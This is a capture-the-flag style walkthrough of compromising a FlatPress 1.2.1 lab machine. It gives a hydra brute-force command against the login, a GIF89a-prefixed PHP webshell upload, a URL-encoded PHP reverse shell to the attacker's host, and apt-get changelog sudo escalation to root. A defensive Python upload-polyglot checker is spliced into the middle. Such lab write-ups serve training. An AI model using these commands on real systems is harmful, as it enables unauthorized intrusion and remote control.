Target IP: 192.168.250.29
Challenge Description: N/A.
Performing a port scan shows there are three TCP ports open on the target machine, as shown above.
Performing an aggressive port scan against the three open TCP ports returns the result above. By the looks of it, there are two HTTP applications: one on port 80 and another on port 8089. I will start enumeration with the application on port 8089, since its name and version, FlatPress fp-1.2.1, are provided in the scan output.
Port 8089: HTTP
Browsing to port 8089 displays the webpage above. There is one article, created by the FlatPress team; I was hoping it would reveal a username for this web application. I scanned the source code of this application and confirmed that the application version is 1.2.1.
Browsing to /login displays the login page shown above. I tried different default credentials such as admin:admin and root:root, but I had no luck.
Doing a Google search for flatpress 1.2.1 exploits returns the interesting GitHub page above. By the looks of it, this application is vulnerable to RCE, but I need valid credentials for the application first. I performed a directory search against this application and did not find anything useful either.
I performed another nmap scan with the flag --script=vuln and found a .gitignore file, which contains the entries shown above.
Browsing to http://192.168.250.29:8089/fp-content/ lists the contents of this web application's content directory. However, I did not find anything important here either.
Using hydra and the command hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.250.29 http-post-form "/login.php:user=admin&pass=^PASS^:Password incorrect." -s 8089, I managed to brute-force the password of the user admin. I obtained the credentials admin:password.
And bingo! I managed to gain access to the web application on port 8089 as the user admin as shown above. From previous enumeration, I found a PoC for the RCE. I will use this against the target web application.
I created the simple PHP webshell above with the name shell.php. It starts with the magic-byte header GIF89a; to bypass the upload filters in place.
Then I pressed the Uploader button and uploaded my shell.php webshell, as shown above.
I browsed to Media Manager and clicked shell.php to open it.
And bingo! I can access my webshell at http://192.168.250.29:8089/fp-content/attachs/shell.php. I issued the commands ls;id;whoami and the target machine executed them successfully, as shown above. Time to obtain a reverse shell connection now.
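As an added defensive example (not code from this write-up or from FlatPress), the following Python inspects an upload the way the bypassed filter should have: the magic bytes are recorded but never trusted on their own, the body is searched for PHP open tags, and the extension is compared against a constructed list of server-executable extensions. The sample files are constructed here, not taken from the lab machine.

```python
import re
from typing import Dict, List, Optional

# Leading magic bytes a typical image-only upload filter whitelists.
# Assumption (not from the write-up): the bypassed filter checked only these.
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}

# A PHP open tag anywhere in the body makes an "image" a polyglot that the
# web server will execute if it is written to a PHP-enabled directory.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed list of extensions commonly mapped to the PHP handler.
EXECUTABLE_EXT = {"php", "phtml", "php3", "php4", "php5", "phar", "phps"}


def image_type(data: bytes) -> Optional[str]:
    """Return the image type claimed by the leading magic bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def inspect_upload(filename: str, data: bytes) -> Dict[str, object]:
    """Classify one upload: extension, claimed image type, findings, verdict."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = image_type(data)
    findings: List[str] = []
    if ext in EXECUTABLE_EXT:
        findings.append(f"executable extension .{ext}")
    if PHP_TAG.search(data):
        findings.append("php open tag in body")
    if kind and findings:
        findings.append(f"polyglot: {kind} header with server-side code")
    if kind is None and not findings:
        findings.append("unrecognised file type")
    return {"ext": ext, "image_type": kind, "findings": findings, "accept": not findings}


# Constructed samples: a minimal real GIF, a GIF89a;-prefixed PHP file, plain text.
SAMPLES = {
    "photo.gif": b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";",
    "shell.php": b"GIF89a;<?php /* constructed polyglot body */ ?>",
    "notes.txt": b"plain text, no image header",
}


def scan_all(samples=SAMPLES) -> Dict[str, Dict[str, object]]:
    """Run inspect_upload over every sample and return the results by name."""
    return {name: inspect_upload(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, result in scan_all().items():
        print(name, "ACCEPT" if result["accept"] else "REJECT", result["findings"])
```

The same check can be run over an existing attachments directory to find polyglots that were accepted before the filter was fixed.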
I started a listener on my machine on port 8443 to catch the reverse shell. Since PHP is already available on the target machine, I used the URL-encoded PHP reverse shell code php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.237%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. I obtained a reverse shell connection on my machine on port 8443 as the user www-data. Now I have a foothold on the target machine.
Running sudo -l shows the interesting entry above. The binary apt-get can be executed as the user root without a password.
Gaining a root shell is simple. I used the command sudo apt-get changelog apt first. This opens the changelog documentation. Then I entered the command !/bin/sh to spawn a root shell. Now I have a root shell on the target machine, as shown above.
There is only one flag on the machine, proof.txt, as shown above.